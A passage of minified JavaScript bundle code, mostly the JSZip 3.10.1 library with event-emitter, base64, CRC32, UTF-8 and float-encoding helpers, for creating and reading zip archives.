S(this,ee,!0)},_.prototype.rawListeners=function(ee){return S(this,ee,!1)},_.listenerCount=function(ee,se){return"function"==typeof ee.listenerCount?ee.listenerCount(se):O.call(ee,se)},_.prototype.listenerCount=O,_.prototype.eventNames=function(){return this._eventsCount>0?U(this._events):[]}},645:($,U)=>{U.read=function(E,C,b,_,y){var A,p,D=8*y-_-1,w=(1<>1,S=-7,O=b?y-1:0,B=b?-1:1,K=E[C+O];for(O+=B,A=K&(1<<-S)-1,K>>=-S,S+=D;S>0;A=256*A+E[C+O],O+=B,S-=8);for(p=A&(1<<-S)-1,A>>=-S,S+=_;S>0;p=256*p+E[C+O],O+=B,S-=8);if(0===A)A=1-x;else{if(A===w)return p?NaN:1/0*(K?-1:1);p+=Math.pow(2,_),A-=x}return(K?-1:1)*p*Math.pow(2,A-_)},U.write=function(E,C,b,_,y,A){var p,D,w,x=8*A-y-1,S=(1<>1,B=23===y?Math.pow(2,-24)-Math.pow(2,-77):0,K=_?0:A-1,ee=_?1:-1,se=C<0||0===C&&1/C<0?1:0;for(C=Math.abs(C),isNaN(C)||C===1/0?(D=isNaN(C)?1:0,p=S):(p=Math.floor(Math.log(C)/Math.LN2),C*(w=Math.pow(2,-p))<1&&(p--,w*=2),(C+=p+O>=1?B/w:B*Math.pow(2,1-O))*w>=2&&(p++,w/=2),p+O>=S?(D=0,p=S):p+O>=1?(D=(C*w-1)*Math.pow(2,y),p+=O):(D=C*Math.pow(2,O-1)*Math.pow(2,y),p=0));y>=8;E[b+K]=255&D,K+=ee,D/=256,y-=8);for(p=p<0;E[b+K]=255&p,K+=ee,p/=256,x-=8);E[b+K-ee]|=128*se}},5705:($,U,E)=>{"use strict";var C,b,_=E.g.MutationObserver||E.g.WebKitMutationObserver;if(_){var y=0,A=new _(x),p=E.g.document.createTextNode("");A.observe(p,{characterData:!0}),C=function(){p.data=y=++y%2}}else if(E.g.setImmediate||void 0===E.g.MessageChannel)C="document"in E.g&&"onreadystatechange"in E.g.document.createElement("script")?function(){var S=E.g.document.createElement("script");S.onreadystatechange=function(){x(),S.onreadystatechange=null,S.parentNode.removeChild(S),S=null},E.g.document.documentElement.appendChild(S)}:function(){setTimeout(x,0)};else{var D=new E.g.MessageChannel;D.port1.onmessage=x,C=function(){D.port2.postMessage(0)}}var w=[];function x(){var S,O;b=!0;for(var B=w.length;B;){for(O=w,w=[],S=-1;++S{$.exports="function"==typeof Object.create?function(U,E){E&&(U.super_=E,U.prototype=Object.create(E.prototype,{constructor:{value:U,enumerable:!1,writable:!0,configurable:!0}}))}:function(U,E){if(E){U.super_=E;var C=function(){};C.prototype=E.prototype,U.prototype=new C,U.prototype.constructor=U}}},8458:($,U,E)=>{"use strict";var C=E(8910),b=E(3790),_="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";U.encode=function(y){for(var A,p,D,x,S,O,B=[],K=0,ee=y.length,se=ee,ve="string"!==C.getTypeOf(y);K>4,S=se>1?(15&p)<<2|D>>6:64,O=se>2?63&D:64,B.push(_.charAt(A>>2)+_.charAt(x)+_.charAt(S)+_.charAt(O));return B.join("")},U.decode=function(y){var A,p,D,w,x,S,O=0,B=0,K="data:";if(y.substr(0,K.length)===K)throw new Error("Invalid base64 input, it looks like a data url.");var ee,se=3*(y=y.replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(y.charAt(y.length-1)===_.charAt(64)&&se--,y.charAt(y.length-2)===_.charAt(64)&&se--,se%1!=0)throw new Error("Invalid base64 input, bad content length.");for(ee=b.uint8array?new Uint8Array(0|se):new Array(0|se);O>4,p=(15&w)<<4|(x=_.indexOf(y.charAt(O++)))>>2,D=(3&x)<<6|(S=_.indexOf(y.charAt(O++))),ee[B++]=A,64!==x&&(ee[B++]=p),64!==S&&(ee[B++]=D);return ee}},7326:($,U,E)=>{"use strict";var C=E(8565),b=E(5301),_=E(2541),y=E(5977);function A(p,D,w,x,S){this.compressedSize=p,this.uncompressedSize=D,this.crc32=w,this.compression=x,this.compressedContent=S}A.prototype={getContentWorker:function(){var p=new b(C.Promise.resolve(this.compressedContent)).pipe(this.compression.uncompressWorker()).pipe(new y("data_length")),D=this;return p.on("end",function(){if(this.streamInfo.data_length!==D.uncompressedSize)throw new Error("Bug : uncompressed data size mismatch")}),p},getCompressedWorker:function(){return new b(C.Promise.resolve(this.compressedContent)).withStreamInfo("compressedSize",this.compressedSize).withStreamInfo("uncompressedSize",this.uncompressedSize).withStreamInfo("crc32",this.crc32).withStreamInfo("compression",this.compression)}},A.createWorkerFrom=function(p,D,w){return p.pipe(new _).pipe(new y("uncompressedSize")).pipe(D.compressWorker(w)).pipe(new y("compressedSize")).withStreamInfo("compression",D)},$.exports=A},1678:($,U,E)=>{"use strict";var C=E(3718);U.STORE={magic:"\0\0",compressWorker:function(){return new C("STORE compression")},uncompressWorker:function(){return new C("STORE decompression")}},U.DEFLATE=E(1033)},6988:($,U,E)=>{"use strict";var C=E(8910),b=function(){for(var _,y=[],A=0;A<256;A++){_=A;for(var p=0;p<8;p++)_=1&_?3988292384^_>>>1:_>>>1;y[A]=_}return y}();$.exports=function(_,y){return void 0!==_&&_.length?"string"!==C.getTypeOf(_)?function(A,p,D,w){var x=b,S=0+D;A^=-1;for(var O=0;O>>8^x[255&(A^p[O])];return-1^A}(0|y,_,_.length):function(A,p,D,w){var x=b,S=0+D;A^=-1;for(var O=0;O>>8^x[255&(A^p.charCodeAt(O))];return-1^A}(0|y,_,_.length):0}},6032:($,U)=>{"use strict";U.base64=!1,U.binary=!1,U.dir=!1,U.createFolders=!0,U.date=null,U.compression=null,U.compressionOptions=null,U.comment=null,U.unixPermissions=null,U.dosPermissions=null},8565:($,U,E)=>{"use strict";var C;C="undefined"!=typeof Promise?Promise:E(3389),$.exports={Promise:C}},1033:($,U,E)=>{"use strict";var C="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,b=E(9591),_=E(8910),y=E(3718),A=C?"uint8array":"array";function p(D,w){y.call(this,"FlateWorker/"+D),this._pako=null,this._pakoAction=D,this._pakoOptions=w,this.meta={}}U.magic="\b\0",_.inherits(p,y),p.prototype.processChunk=function(D){this.meta=D.meta,null===this._pako&&this._createPako(),this._pako.push(_.transformTo(A,D.data),!1)},p.prototype.flush=function(){y.prototype.flush.call(this),null===this._pako&&this._createPako(),this._pako.push([],!0)},p.prototype.cleanUp=function(){y.prototype.cleanUp.call(this),this._pako=null},p.prototype._createPako=function(){this._pako=new b[this._pakoAction]({raw:!0,level:this._pakoOptions.level||-1});var D=this;this._pako.onData=function(w){D.push({data:w,meta:D.meta})}},U.compressWorker=function(D){return new p("Deflate",D)},U.uncompressWorker=function(){return new p("Inflate",{})}},4979:($,U,E)=>{"use strict";var C=E(8910),b=E(3718),_=E(3600),y=E(6988),A=E(1141),p=function(S,O){var B,K="";for(B=0;B>>=8;return K},D=function(S,O,B,K,ee,se){var ve,le,ye=S.file,z=S.compression,l=se!==_.utf8encode,f=C.transformTo("string",se(ye.name)),v=C.transformTo("string",_.utf8encode(ye.name)),M=ye.comment,P=C.transformTo("string",se(M)),G=C.transformTo("string",_.utf8encode(M)),X=v.length!==ye.name.length,L=G.length!==M.length,h="",R="",J="",Z=ye.dir,ue=ye.date,Ie={crc32:0,compressedSize:0,uncompressedSize:0};O&&!B||(Ie.crc32=S.crc32,Ie.compressedSize=S.compressedSize,Ie.uncompressedSize=S.uncompressedSize);var Ae=0;O&&(Ae|=8),l||!X&&!L||(Ae|=2048);var Ue,Xe,He=0,Be=0;Z&&(He|=16),"UNIX"===ee?(Be=798,He|=(Xe=Ue=ye.unixPermissions,Ue||(Xe=Z?16893:33204),(65535&Xe)<<16)):(Be=20,He|=63&(ye.dosPermissions||0)),ve=ue.getUTCHours(),ve<<=6,ve|=ue.getUTCMinutes(),ve<<=5,ve|=ue.getUTCSeconds()/2,le=ue.getUTCFullYear()-1980,le<<=4,le|=ue.getUTCMonth()+1,le<<=5,le|=ue.getUTCDate(),X&&(R=p(1,1)+p(y(f),4)+v,h+="up"+p(R.length,2)+R),L&&(J=p(1,1)+p(y(P),4)+G,h+="uc"+p(J.length,2)+J);var qe="";return qe+="\n\0",qe+=p(Ae,2),qe+=z.magic,qe+=p(ve,2),qe+=p(le,2),qe+=p(Ie.crc32,4),qe+=p(Ie.compressedSize,4),qe+=p(Ie.uncompressedSize,4),qe+=p(f.length,2),qe+=p(h.length,2),{fileRecord:A.LOCAL_FILE_HEADER+qe+f+h,dirRecord:A.CENTRAL_FILE_HEADER+p(Be,2)+qe+p(P.length,2)+"\0\0\0\0"+p(He,4)+p(K,4)+f+h+P}},w=function(S){return A.DATA_DESCRIPTOR+p(S.crc32,4)+p(S.compressedSize,4)+p(S.uncompressedSize,4)};function x(S,O,B,K){b.call(this,"ZipFileWorker"),this.bytesWritten=0,this.zipComment=O,this.zipPlatform=B,this.encodeFileName=K,this.streamFiles=S,this.accumulate=!1,this.contentBuffer=[],this.dirRecords=[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}C.inherits(x,b),x.prototype.push=function(S){var O=S.meta.percent||0,B=this.entriesCount,K=this._sources.length;this.accumulate?this.contentBuffer.push(S):(this.bytesWritten+=S.data.length,b.prototype.push.call(this,{data:S.data,meta:{currentFile:this.currentFile,percent:B?(O+100*(B-K-1))/B:100}}))},x.prototype.openedSource=function(S){this.currentSourceOffset=this.bytesWritten,this.currentFile=S.file.name;var O=this.streamFiles&&!S.file.dir;if(O){var B=D(S,O,!1,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);this.push({data:B.fileRecord,meta:{percent:0}})}else this.accumulate=!0},x.prototype.closedSource=function(S){this.accumulate=!1;var O=this.streamFiles&&!S.file.dir,B=D(S,O,!0,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);if(this.dirRecords.push(B.dirRecord),O)this.push({data:w(S),meta:{percent:100}});else for(this.push({data:B.fileRecord,meta:{percent:0}});this.contentBuffer.length;)this.push(this.contentBuffer.shift());this.currentFile=null},x.prototype.flush=function(){for(var S=this.bytesWritten,O=0;O{"use strict";var C=E(1678),b=E(4979);U.generateWorker=function(_,y,A){var p=new b(y.streamFiles,A,y.platform,y.encodeFileName),D=0;try{_.forEach(function(w,x){D++;var S=function(ee,se){var ve=ee||se,le=C[ve];if(!le)throw new Error(ve+" is not a valid compression method !");return le}(x.options.compression,y.compression),B=x.dir,K=x.date;x._compressWorker(S,x.options.compressionOptions||y.compressionOptions||{}).withStreamInfo("file",{name:w,dir:B,date:K,comment:x.comment||"",unixPermissions:x.unixPermissions,dosPermissions:x.dosPermissions}).pipe(p)}),p.entriesCount=D}catch(w){p.error(w)}return p}},6085:($,U,E)=>{"use strict";function C(){if(!(this instanceof C))return new C;if(arguments.length)throw new Error("The constructor with parameters has been removed in JSZip 3.0, please check the upgrade guide.");this.files=Object.create(null),this.comment=null,this.root="",this.clone=function(){var b=new C;for(var _ in this)"function"!=typeof this[_]&&(b[_]=this[_]);return b}}(C.prototype=E(7132)).loadAsync=E(1062),C.support=E(3790),C.defaults=E(6032),C.version="3.10.1",C.loadAsync=function(b,_){return(new C).loadAsync(b,_)},C.external=E(8565),$.exports=C},1062:($,U,E)=>{"use strict";var C=E(8910),b=E(8565),_=E(3600),y=E(6624),A=E(2541),p=E(2182);function D(w){return new b.Promise(function(x,S){var O=w.decompressed.getContentWorker().pipe(new A);O.on("error",function(B){S(B)}).on("end",function(){O.streamInfo.crc32!==w.decompressed.crc32?S(new Error("Corrupted zip : CRC32 mismatch")):x()}).resume()})}$.exports=function(w,x){var S=this;return x=C.extend(x||{},{base64:!1,checkCRC32:!1,optimizedBinaryString:!1,createFolders:!1,decodeFileName:_.utf8decode}),p.isNode&&p.isStream(w)?b.Promise.reject(new Error("JSZip can't accept a stream when loading a zip file.")):C.prepareContent("the loaded zip file",w,!0,x.optimizedBinaryString,x.base64).then(function(O){var B=new y(x);return B.load(O),B}).then(function(O){var B=[b.Promise.resolve(O)],K=O.files;if(x.checkCRC32)for(var ee=0;ee{"use strict";var C=E(8910),b=E(3718);function _(y,A){b.call(this,"Nodejs stream input adapter for "+y),this._upstreamEnded=!1,this._bindStream(A)}C.inherits(_,b),_.prototype._bindStream=function(y){var A=this;this._stream=y,y.pause(),y.on("data",function(p){A.push({data:p,meta:{percent:0}})}).on("error",function(p){A.isPaused?this.generatedError=p:A.error(p)}).on("end",function(){A.isPaused?A._upstreamEnded=!0:A.end()})},_.prototype.pause=function(){return!!b.prototype.pause.call(this)&&(this._stream.pause(),!0)},_.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(this._upstreamEnded?this.end():this._stream.resume(),!0)},$.exports=_},1220:($,U,E)=>{"use strict";var C=E(749).Readable;function b(_,y,A){C.call(this,y),this._helper=_;var p=this;_.on("data",function(D,w){p.push(D)||p._helper.pause(),A&&A(w)}).on("error",function(D){p.emit("error",D)}).on("end",function(){p.push(null)})}E(8910).inherits(b,C),b.prototype._read=function(){this._helper.resume()},$.exports=b},2182:$=>{"use strict";$.exports={isNode:void 0!==ie,newBufferFrom:function(U,E){if(ie.from&&ie.from!==Uint8Array.from)return ie.from(U,E);if("number"==typeof U)throw new Error('The "data" argument must not be a number');return new ie(U,E)},allocBuffer:function(U){if(ie.alloc)return ie.alloc(U);var E=new ie(U);return E.fill(0),E},isBuffer:function(U){return ie.isBuffer(U)},isStream:function(U){return U&&"function"==typeof U.on&&"function"==typeof U.pause&&"function"==typeof U.resume}}},7132:($,U,E)=>{"use strict";var C=E(3600),b=E(8910),_=E(3718),y=E(1285),A=E(6032),p=E(7326),D=E(6859),w=E(7834),x=E(2182),S=E(660),O=function(le,ye,z){var l,P,f=b.getTypeOf(ye),v=b.extend(z||{},A);v.date=v.date||new Date,null!==v.compression&&(v.compression=v.compression.toUpperCase()),"string"==typeof v.unixPermissions&&(v.unixPermissions=parseInt(v.unixPermissions,8)),v.unixPermissions&&16384&v.unixPermissions&&(v.dir=!0),v.dosPermissions&&16&v.dosPermissions&&(v.dir=!0),v.dir&&(le=K(le)),v.createFolders&&(l=B(le))&&ee.call(this,l,!0),z&&void 0!==z.binary||(v.binary=!("string"===f&&!1===v.binary&&!1===v.base64)),(ye instanceof p&&0===ye.uncompressedSize||v.dir||!ye||0===ye.length)&&(v.base64=!1,v.binary=!0,ye="",v.compression="STORE",f="string"),P=ye instanceof p||ye instanceof _?ye:x.isNode&&x.isStream(ye)?new S(le,ye):b.prepareContent(le,ye,v.binary,v.optimizedBinaryString,v.base64);var G=new D(le,P,v);this.files[le]=G},B=function(le){"/"===le.slice(-1)&&(le=le.substring(0,le.length-1));var ye=le.lastIndexOf("/");return ye>0?le.substring(0,ye):""},K=function(le){return"/"!==le.slice(-1)&&(le+="/"),le},ee=function(le,ye){return ye=void 0!==ye?ye:A.createFolders,le=K(le),this.files[le]||O.call(this,le,null,{dir:!0,createFolders:ye}),this.files[le]};function se(le){return"[object RegExp]"===Object.prototype.toString.call(le)}var ve={load:function(){throw new Error("This method has been removed in JSZip 3.0, please check the upgrade guide.")},forEach:function(le){var ye,z,l;for(ye in this.files)l=this.files[ye],(z=ye.slice(this.root.length,ye.length))&&ye.slice(0,this.root.length)===this.root&&le(z,l)},filter:function(le){var ye=[];return this.forEach(function(z,l){le(z,l)&&ye.push(l)}),ye},file:function(le,ye,z){if(1===arguments.length){if(se(le)){var l=le;return this.filter(function(v,M){return!M.dir&&l.test(v)})}var f=this.files[this.root+le];return f&&!f.dir?f:null}return O.call(this,le=this.root+le,ye,z),this},folder:function(le){if(!le)return this;if(se(le))return this.filter(function(f,v){return v.dir&&le.test(f)});var z=ee.call(this,this.root+le),l=this.clone();return l.root=z.name,l},remove:function(le){var ye=this.files[le=this.root+le];if(ye||("/"!==le.slice(-1)&&(le+="/"),ye=this.files[le]),ye&&!ye.dir)delete this.files[le];else for(var z=this.filter(function(f,v){return v.name.slice(0,le.length)===le}),l=0;l{"use strict";$.exports=E(2830)},2370:($,U,E)=>{"use strict";var C=E(8542);function b(_){C.call(this,_);for(var y=0;y=0;--w)if(this.data[w]===y&&this.data[w+1]===A&&this.data[w+2]===p&&this.data[w+3]===D)return w-this.zero;return-1},b.prototype.readAndCheckSignature=function(_){var y=_.charCodeAt(0),A=_.charCodeAt(1),p=_.charCodeAt(2),D=_.charCodeAt(3),w=this.readData(4);return y===w[0]&&A===w[1]&&p===w[2]&&D===w[3]},b.prototype.readData=function(_){if(this.checkOffset(_),0===_)return[];var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},$.exports=b},8542:($,U,E)=>{"use strict";var C=E(8910);function b(_){this.data=_,this.length=_.length,this.index=0,this.zero=0}b.prototype={checkOffset:function(_){this.checkIndex(this.index+_)},checkIndex:function(_){if(this.length=this.index;y--)A=(A<<8)+this.byteAt(y);return this.index+=_,A},readString:function(_){return C.transformTo("string",this.readData(_))},readData:function(){},lastIndexOfSignature:function(){},readAndCheckSignature:function(){},readDate:function(){var _=this.readInt(4);return new Date(Date.UTC(1980+(_>>25&127),(_>>21&15)-1,_>>16&31,_>>11&31,_>>5&63,(31&_)<<1))}},$.exports=b},9583:($,U,E)=>{"use strict";var C=E(414);function b(_){C.call(this,_)}E(8910).inherits(b,C),b.prototype.readData=function(_){this.checkOffset(_);var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},$.exports=b},9226:($,U,E)=>{"use strict";var C=E(8542);function b(_){C.call(this,_)}E(8910).inherits(b,C),b.prototype.byteAt=function(_){return this.data.charCodeAt(this.zero+_)},b.prototype.lastIndexOfSignature=function(_){return this.data.lastIndexOf(_)-this.zero},b.prototype.readAndCheckSignature=function(_){return _===this.readData(4)},b.prototype.readData=function(_){this.checkOffset(_);var y=this.data.slice(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},$.exports=b},414:($,U,E)=>{"use strict";var C=E(2370);function b(_){C.call(this,_)}E(8910).inherits(b,C),b.prototype.readData=function(_){if(this.checkOffset(_),0===_)return new Uint8Array(0);var y=this.data.subarray(this.zero+this.index,this.zero+this.index+_);return this.index+=_,y},$.exports=b},8435:($,U,E)=>{"use strict";var C=E(8910),b=E(3790),_=E(2370),y=E(9226),A=E(9583),p=E(414);$.exports=function(D){var w=C.getTypeOf(D);return C.checkSupport(w),"string"!==w||b.uint8array?"nodebuffer"===w?new A(D):b.uint8array?new p(C.transformTo("uint8array",D)):new _(C.transformTo("array",D)):new y(D)}},1141:($,U)=>{"use strict";U.LOCAL_FILE_HEADER="PK\x03\x04",U.CENTRAL_FILE_HEADER="PK\x01\x02",U.CENTRAL_DIRECTORY_END="PK\x05\x06",U.ZIP64_CENTRAL_DIRECTORY_LOCATOR="PK\x06\x07",U.ZIP64_CENTRAL_DIRECTORY_END="PK\x06\x06",U.DATA_DESCRIPTOR="PK\x07\b"},4293:($,U,E)=>{"use strict";var C=E(3718),b=E(8910);function _(y){C.call(this,"ConvertWorker to "+y),this.destType=y}b.inherits(_,C),_.prototype.processChunk=function(y){this.push({data:b.transformTo(this.destType,y.data),meta:y.meta})},$.exports=_},2541:($,U,E)=>{"use strict";var C=E(3718),b=E(6988);function _(){C.call(this,"Crc32Probe"),this.withStreamInfo("crc32",0)}E(8910).inherits(_,C),_.prototype.processChunk=function(y){this.streamInfo.crc32=b(y.data,this.streamInfo.crc32||0),this.push(y)},$.exports=_},5977:($,U,E)=>{"use strict";var C=E(8910),b=E(3718);function _(y){b.call(this,"DataLengthProbe for "+y),this.propName=y,this.withStreamInfo(y,0)}C.inherits(_,b),_.prototype.processChunk=function(y){y&&(this.streamInfo[this.propName]=(this.streamInfo[this.propName]||0)+y.data.length),b.prototype.processChunk.call(this,y)},$.exports=_},5301:($,U,E)=>{"use strict";var C=E(8910),b=E(3718);function _(y){b.call(this,"DataWorker");var A=this;this.dataIsReady=!1,this.index=0,this.max=0,this.data=null,this.type="",this._tickScheduled=!1,y.then(function(p){A.dataIsReady=!0,A.data=p,A.max=p&&p.length||0,A.type=C.getTypeOf(p),A.isPaused||A._tickAndRepeat()},function(p){A.error(p)})}C.inherits(_,b),_.prototype.cleanUp=function(){b.prototype.cleanUp.call(this),this.data=null},_.prototype.resume=function(){return!!b.prototype.resume.call(this)&&(!this._tickScheduled&&this.dataIsReady&&(this._tickScheduled=!0,C.delay(this._tickAndRepeat,[],this)),!0)},_.prototype._tickAndRepeat=function(){this._tickScheduled=!1,this.isPaused||this.isFinished||(this._tick(),this.isFinished||(C.delay(this._tickAndRepeat,[],this),this._tickScheduled=!0))},_.prototype._tick=function(){if(this.isPaused||this.isFinished)return!1;var y=null,A=Math.min(this.max,this.index+16384);if(this.index>=this.max)return this.end();switch(this.type){case"string":y=this.data.substring(this.index,A);break;case"uint8array":y=this.data.subarray(this.index,A);break;case"array":case"nodebuffer":y=this.data.slice(this.index,A)}return this.index=A,this.push({data:y,meta:{percent:this.max?this.index/this.max*100:0}})},$.exports=_},3718:$=>{"use strict";function U(E){this.name=E||"default",this.streamInfo={},this.generatedError=null,this.extraStreamInfo={},this.isPaused=!0,this.isFinished=!1,this.isLocked=!1,this._listeners={data:[],end:[],error:[]},this.previous=null}U.prototype={push:function(E){this.emit("data",E)},end:function(){if(this.isFinished)return!1;this.flush();try{this.emit("end"),this.cleanUp(),this.isFinished=!0}catch(E){this.emit("error",E)}return!0},error:function(E){return!this.isFinished&&(this.isPaused?this.generatedError=E:(this.isFinished=!0,this.emit("error",E),this.previous&&this.previous.error(E),this.cleanUp()),!0)},on:function(E,C){return this._listeners[E].push(C),this},cleanUp:function(){this.streamInfo=this.generatedError=this.extraStreamInfo=null,this._listeners=[]},emit:function(E,C){if(this._listeners[E])for(var b=0;b "+E:E}},$.exports=U},1285:($,U,E)=>{"use strict";var C=E(8910),b=E(4293),_=E(3718),y=E(8458),A=E(3790),p=E(8565),D=null;if(A.nodestream)try{D=E(1220)}catch(x){}function w(x,S,O){var B=S;switch(S){case"blob":case"arraybuffer":B="uint8array";break;case"base64":B="string"}try{this._internalType=B,this._outputType=S,this._mimeType=O,C.checkSupport(B),this._worker=x.pipe(new b(B)),x.lock()}catch(K){this._worker=new _("error"),this._worker.error(K)}}w.prototype={accumulate:function(x){return S=this,O=x,new p.Promise(function(B,K){var ee=[],se=S._internalType,ve=S._outputType,le=S._mimeType;S.on("data",function(ye,z){ee.push(ye),O&&O(z)}).on("error",function(ye){ee=[],K(ye)}).on("end",function(){try{var ye=function(z,l,f){switch(z){case"blob":return C.newBlob(C.transformTo("arraybuffer",l),f);case"base64":return y.encode(l);default:return C.transformTo(z,l)}}(ve,function(z,l){var f,v=0,M=null,P=0;for(f=0;f{"use strict";if(U.base64=!0,U.array=!0,U.string=!0,U.arraybuffer="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array,U.nodebuffer=void 0!==ie,U.uint8array="undefined"!=typeof Uint8Array,"undefined"==typeof ArrayBuffer)U.blob=!1;else{var C=new ArrayBuffer(0);try{U.blob=0===new Blob([C],{type:"application/zip"}).size}catch(_){try{var b=new(self.BlobBuilder||self.WebKitBlobBuilder||self.MozBlobBuilder||self.MSBlobBuilder);b.append(C),U.blob=0===b.getBlob("application/zip").size}catch(y){U.blob=!1}}}try{U.nodestream=!!E(749).Readable}catch(_){U.nodestream=!1}},3600:($,U,E)=>{"use strict";for(var C=E(8910),b=E(3790),_=E(2182),y=E(3718),A=new Array(256),p=0;p<256;p++)A[p]=p>=252?6:p>=248?5:p>=240?4:p>=224?3:p>=192?2:1;function D(){y.call(this,"utf-8 decode"),this.leftOver=null}function w(){y.call(this,"utf-8 encode")}A[254]=A[254]=1,U.utf8encode=function(x){return b.nodebuffer?_.newBufferFrom(x,"utf-8"):function(S){var O,B,K,ee,se,ve=S.length,le=0;for(ee=0;ee>>6,O[se++]=128|63&B):B<65536?(O[se++]=224|B>>>12,O[se++]=128|B>>>6&63,O[se++]=128|63&B):(O[se++]=240|B>>>18,O[se++]=128|B>>>12&63,O[se++]=128|B>>>6&63,O[se++]=128|63&B);return O}(x)},U.utf8decode=function(x){return b.nodebuffer?C.transformTo("nodebuffer",x).toString("utf-8"):function(S){var O,B,K,ee,se=S.length,ve=new Array(2*se);for(B=0,O=0;O4)ve[B++]=65533,O+=ee-1;else{for(K&=2===ee?31:3===ee?15:7;ee>1&&O1?ve[B++]=65533:K<65536?ve[B++]=K:(ve[B++]=55296|(K-=65536)>>10&1023,ve[B++]=56320|1023&K)}return ve.length!==B&&(ve.subarray?ve=ve.subarray(0,B):ve.length=B),C.applyFromCharCode(ve)}(x=C.transformTo(b.uint8array?"uint8array":"array",x))},C.inherits(D,y),D.prototype.processChunk=function(x){var S=C.transformTo(b.uint8array?"uint8array":"array",x.data);if(this.leftOver&&this.leftOver.length){if(b.uint8array){var O=S;(S=new Uint8Array(O.length+this.leftOver.length)).set(this.leftOver,0),S.set(O,this.leftOver.length)}else S=this.leftOver.concat(S);this.leftOver=null}var B=function(ee,se){var ve;for((se=se||ee.length)>ee.length&&(se=ee.length),ve=se-1;ve>=0&&128==(192&ee[ve]);)ve--;return ve<0||0===ve?se:ve+A[ee[ve]]>se?ve:se}(S),K=S;B!==S.length&&(b.uint8array?(K=S.subarray(0,B),this.leftOver=S.subarray(B,S.length)):(K=S.slice(0,B),this.leftOver=S.slice(B,S.length))),this.push({data:U.utf8decode(K),meta:x.meta})},D.prototype.flush=function(){this.leftOver&&this.leftOver.length&&(this.push({data:U.utf8decode(this.leftOver),meta:{}}),this.leftOver=null)},U.Utf8DecodeWorker=D,C.inherits(w,y),w.prototype.processChunk=function(x){this.push({data:U.utf8encode(x.data),meta:x.meta})},U.Utf8EncodeWorker=w},8910:($,U,E)=>{"use strict";var C=E(3790),b=E(8458),_=E(2182),y=E(8565);function A(O){return O}function p(O,B){for(var K=0;K1;)try{return D.stringifyByChunk(O,K,B)}catch(se){B=Math.floor(B/2)}return D.stringifyByChar(O)}function x(O,B){for(var K=0;K{"use strict";var C=E(8435),b=E(8910),_=E(1141),y=E(9392),A=E(3790);function p(D){this.files=[],this.loadOptions=D}p.prototype={checkSignature:function(D){if(!this.reader.readAndCheckSignature(D)){this.reader.index-=4;var w=this.reader.readString(4);throw new Error("Corrupted zip or bug: unexpected signature ("+b.pretty(w)+", expected "+b.pretty(D)+")")}},isSignature:function(D,w){var x=this.reader.index;this.reader.setIndex(D);var S=this.reader.readString(4)===w;return this.reader.setIndex(x),S},readBlockEndOfCentral:function(){this.diskNumber=this.reader.readInt(2),this.diskWithCentralDirStart=this.reader.readInt(2),this.centralDirRecordsOnThisDisk=this.reader.readInt(2),this.centralDirRecords=this.reader.readInt(2),this.centralDirSize=this.reader.readInt(4),this.centralDirOffset=this.reader.readInt(4),this.zipCommentLength=this.reader.readInt(2);var D=this.reader.readData(this.zipCommentLength),x=b.transformTo(A.uint8array?"uint8array":"array",D);this.zipComment=this.loadOptions.decodeFileName(x)},readBlockZip64EndOfCentral:function(){this.zip64EndOfCentralSize=this.reader.readInt(8),this.reader.skip(4),this.diskNumber=this.reader.readInt(4),this.diskWithCentralDirStart=this.reader.readInt(4),this.centralDirRecordsOnThisDisk=this.reader.readInt(8),this.centralDirRecords=this.reader.readInt(8),this.centralDirSize=this.reader.readInt(8),this.centralDirOffset=this.reader.readInt(8),this.zip64ExtensibleData={};for(var D,w,x,S=this.zip64EndOfCentralSize-44;01)throw new Error("Multi-volumes zip are not supported")},readLocalFiles:function(){var D,w;for(D=0;D0)this.isSignature(w,_.CENTRAL_FILE_HEADER)||(this.reader.zero=S);else if(S<0)throw new Error("Corrupted zip: missing "+Math.abs(S)+" bytes.")},prepareReader:function(D){this.reader=C(D)},load:function(D){this.prepareReader(D),this.readEndOfCentral(),this.readCentralDir(),this.readLocalFiles()}},$.exports=p},9392:($,U,E)=>{"use strict";var C=E(8435),b=E(8910),_=E(7326),y=E(6988),A=E(3600),p=E(1678),D=E(3790);function w(x,S){this.options=x,this.loadOptions=S}w.prototype={isEncrypted:function(){return 1==(1&this.bitFlag)},useUTF8:function(){return 2048==(2048&this.bitFlag)},readLocalPart:function(x){var S,O;if(x.skip(22),this.fileNameLength=x.readInt(2),O=x.readInt(2),this.fileName=x.readData(this.fileNameLength),x.skip(O),-1===this.compressedSize||-1===this.uncompressedSize)throw new Error("Bug or corrupted zip : didn't get enough information from the central directory (compressedSize === -1 || uncompressedSize === -1)");if(null===(S=function(B){for(var K in p)if(Object.prototype.hasOwnProperty.call(p,K)&&p[K].magic===B)return p[K];return null}(this.compressionMethod)))throw new Error("Corrupted zip : compression "+b.pretty(this.compressionMethod)+" unknown (inner file : "+b.transformTo("string",this.fileName)+")");this.decompressed=new _(this.compressedSize,this.uncompressedSize,this.crc32,S,x.readData(this.compressedSize))},readCentralPart:function(x){this.versionMadeBy=x.readInt(2),x.skip(2),this.bitFlag=x.readInt(2),this.compressionMethod=x.readString(2),this.date=x.readDate(),this.crc32=x.readInt(4),this.compressedSize=x.readInt(4),this.uncompressedSize=x.readInt(4);var S=x.readInt(2);if(this.extraFieldsLength=x.readInt(2),this.fileCommentLength=x.readInt(2),this.diskNumberStart=x.readInt(2),this.internalFileAttributes=x.readInt(2),this.externalFileAttributes=x.readInt(4),this.localHeaderOffset=x.readInt(4),this.isEncrypted())throw new Error("Encrypted zip are not supported");x.skip(S),this.readExtraFields(x),this.parseZIP64ExtraField(x),this.fileComment=x.readData(this.fileCommentLength)},processAttributes:function(){this.unixPermissions=null,this.dosPermissions=null;var 